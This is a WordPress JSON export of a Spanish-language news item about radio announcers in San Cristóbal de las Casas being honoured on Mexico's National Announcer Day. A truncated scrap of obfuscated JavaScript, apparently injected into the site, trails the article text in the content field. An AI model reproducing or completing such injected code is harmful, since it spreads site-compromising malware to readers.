{"id":17862,"date":"2024-09-14T06:28:56","date_gmt":"2024-09-14T06:28:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17862"},"modified":"2024-09-14T06:28:57","modified_gmt":"2024-09-14T06:28:57","slug":"reconocen-a-locutores-por-su-destacada-trayectoria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17862","title":{"rendered":"Reconocen a locutores por su destacada trayectoria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"573\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240913-WA0043-1024x573.jpg\" alt=\"\" class=\"wp-image-17863\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240913-WA0043-1024x573.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240913-WA0043-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240913-WA0043-768x430.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240913-WA0043.jpg 1071w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>13 de septiembre del 2024. San Crist\u00f3bal de las Casas.- En el marco del D\u00eda Nacional del Locutor, la Asociaci\u00f3n Nacional de Locutores de M\u00e9xico, Delegaci\u00f3n San Crist\u00f3bal, presidida por Cristytey Guill\u00e9n, reconocer\u00e1 ma\u00f1ana a destacados profesionales del medio radiof\u00f3nico por su trayectoria y contribuci\u00f3n a la comunicaci\u00f3n en la regi\u00f3n.<\/p>\n\n\n\n<p>Los homenajeados ser\u00e1n Miguel \u00c1ngel Aguirre Aguilar, Juan Alonzo Cruz L\u00f3pez, Jos\u00e9 Luis L\u00f3pez Trujillo, Francisco Hidalgo D\u00edaz, Jos\u00e9 Francisco Narv\u00e1ez Trejo, Ricardo Valdiviezo S\u00e1nchez (in memoriam) y Juan de Dios Zapata Ruiz. Estos locutores, provenientes de diversas emisoras, han sido seleccionados mediante un consenso entre los agremiados, que suman alrededor de 30 profesionales de la voz en la delegaci\u00f3n.<\/p>\n\n\n\n<p>En entrevista, Guill\u00e9n destac\u00f3 que este reconocimiento es un homenaje al esfuerzo y dedicaci\u00f3n de los locutores, quienes d\u00eda a d\u00eda se encargan de llevar informaci\u00f3n, entretenimiento y cultura a los hogares chiapanecos. &#8220;Queremos reconocer a compa\u00f1eros de diferentes estaciones por su trayectoria y el compromiso que han demostrado a lo largo de los a\u00f1os&#8221;, afirm\u00f3.<\/p>\n\n\n\n<p>El evento de premiaci\u00f3n se llevar\u00e1 a cabo ma\u00f1ana al mediod\u00eda en el auditorio de la escuela Manuel Jos\u00e9 de Rojas, donde se espera la asistencia de colegas y familiares de los galardonados, as\u00ed como de autoridades locales y miembros de la comunidad.<\/p>\n\n\n\n<p>El D\u00eda Nacional del Locutor, que se celebra el 14 de septiembre, es una fecha emblem\u00e1tica para reconocer la labor de quienes a trav\u00e9s de sus voces se han convertido en referentes de la comunicaci\u00f3n en M\u00e9xico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 13 de septiembre del 2024. San Crist\u00f3bal de las Casas.- En el marco del D\u00eda Nacional del Locutor, la Asociaci\u00f3n Nacional de Locutores de M\u00e9xico, Delegaci\u00f3n San Crist\u00f3bal, presidida por Cristytey Guill\u00e9n, reconocer\u00e1 ma\u00f1ana a destacados profesionales del medio radiof\u00f3nico por su trayectoria y contribuci\u00f3n a la comunicaci\u00f3n en la regi\u00f3n. Los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17863,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17862","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17862","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17862"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17862\/revisions"}],"predecessor-version":[{"id":17864,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17862\/revisions\/17864"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17863"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17862"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17862"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}